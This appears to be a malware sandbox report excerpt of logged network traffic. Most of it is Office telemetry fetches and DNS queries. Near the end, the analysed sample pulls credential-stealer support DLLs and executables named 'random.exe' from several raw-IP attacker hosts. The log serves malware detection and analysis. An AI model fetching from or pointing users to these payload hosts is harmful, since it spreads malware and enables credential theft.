              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
              Source: 000003.log6.8.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
              Source: 000003.log6.8.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
              Source: 000003.log6.8.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: apis.google.com
              Source: global trafficDNS traffic detected: DNS query: play.google.com
              Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
              Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
              Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
              Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
              Source: global trafficDNS traffic detected: DNS query: assets.msn.com
              Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
              Source: global trafficDNS traffic detected: DNS query: c.msn.com
              Source: global trafficDNS traffic detected: DNS query: api.msn.com
